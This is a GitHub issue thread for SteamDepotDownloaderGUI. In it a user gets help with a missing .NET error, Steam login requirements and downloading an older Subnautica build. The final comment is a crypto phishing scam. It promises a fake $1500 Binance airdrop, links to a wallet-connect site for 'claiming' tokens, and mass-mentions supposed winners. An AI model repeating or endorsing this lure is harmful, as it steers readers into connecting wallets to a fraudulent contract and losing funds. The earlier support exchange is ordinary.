### ISSUE TITLE
 dotnet was not found.

### ISSUE THREAD

**Issue by ShadowVexe** [mmvanheusden/SteamDepotDownloaderGUI#150]
In the steam depot downloader gui I'm getting an error that states  "dotnet was not found." Even though I have it downloaded on my computer. I downloaded the dotnet right off of the gui. Does anyone know how to fix this? Please help me out.

**Comment by mmvanheusden** [comment]
After installing .NET, reopen it.

**Comment by mmvanheusden** [comment]
I'll add a notice that attends users on this.

**Comment by mmvanheusden** [comment]
> I'll add a notice that attends users on this.

Done.

**Comment by ShadowVexe** [comment]
Ok this worked but now I am getting a different error while trying to download the older version of subnatica for the multiplayer mod.  "App 264710 (Subnautica) is not available from this account. Disconnected from Steam." This is the error I am getting. I might have the wrong Depot and Manifest Id's.

<img width="310" alt="Screenshot 2023-12-26 111150" src="https://github.com/mmvanheusden/SteamDepotDownloaderGUI/assets/154869089/f4ccd5de-e172-4005-921b-6029dd4ed609">

**Comment by mmvanheusden** [comment]
> Ok this worked but now I am getting a different error while trying to download the older version of subnatica for the multiplayer mod. "App 264710 (Subnautica) is not available from this account. Disconnected from Steam." This is the error I am getting. I might have the wrong Depot and Manifest Id's.
> <img alt="Screenshot 2023-12-26 111150" width="310" src="https://private-user-images.githubusercontent.com/154869089/292910560-f4ccd5de-e172-4005-921b-6029dd4ed609.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTEiLCJleHAiOjE3MDM2MTk4NTcsIm5iZiI6MTcwMzYxOTU1NywicGF0aCI6Ii8xNTQ4NjkwODkvMjkyOTEwNTYwLWY0Y2NkNWRlLWUxNzItNDAwNS05MjFiLTYwMjlkZDRlZDYwOS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBSVdOSllBWDRDU1ZFSDUzQSUyRjIwMjMxMjI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDIzMTIyNlQxOTM5MTdaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03NzRiMzU5NTRmNmQ1MzMzZDY1YTRkNjJhNzZiOGYxNWVmZDNiZTA3MjMyZjEzN2M0ZjZiN2FiYTBkOWNjZjdjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.9bjo-msQwvlfJ-srs19wo5Sw5Wr6qHNZULp2w8_ZcDg">

Hi, you have to log in to download (most) games. Downloading manifests without an account isn't possible.

**Comment by ShadowVexe** [comment]
Do you know the correct ID's for subnatica before the living large update?

**Comment by ShadowVexe** [comment]
I downloaded the game but where do I acess the game because it isnt downloaded in my library?
\

**Comment by mmvanheusden** [comment]
> I downloaded the game but where do I acess the game because it isnt downloaded in my library?
> \
> 

Hey, please update to the latest version. you can choose where you download to on there

**Comment by mmvanheusden** [comment]
> Do you know the correct ID's for subnatica before the living large update?

Every build before December 13 2022.
source: https://subnautica.fandom.com/wiki/Update_History_(Subnautica)

**Comment by mmvanheusden** [comment]
Also I have a little tip specifically for Subnautica; It migjt be possible that when you open the older game files, the one you had installed opens instead. In that case you have to replace the new files with the old ones.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @ceostevenjrogers, @satanicHAktavist69, @doge-fund, @salmjacks, @kbad01, @MakraStefan, @mikeyee, @ravirajcm, @marcosebeto, @JavaHello, @gagichce, @PascalRoose, @likehackzone, @noshaba, @lisasu-g, @isaigm, @lev5238, @curtislin7, @jraesly, @ryanlijianchang, @zachspar, @ItsWidee, @hashim-hs46, @LiorMoshe, @mathiasfc, @edmglee, @gabizinha12, @beshup, @kobmik, @yoursungjin, @johannbuscail, @Zaista, @lupindong, @marpit19, @brendonmatos, @MarkJocas, @massoudasadi, @hwangsyin, @vulture990, @Thr11EyE, @petegeste, @shashwatah, @JeffLuoo, @therealdj97, @jcruzvaldez02292016, @DamianoPellegrini, @Floodcap, @appi147, @Jimmydajet, @JackLiao2014
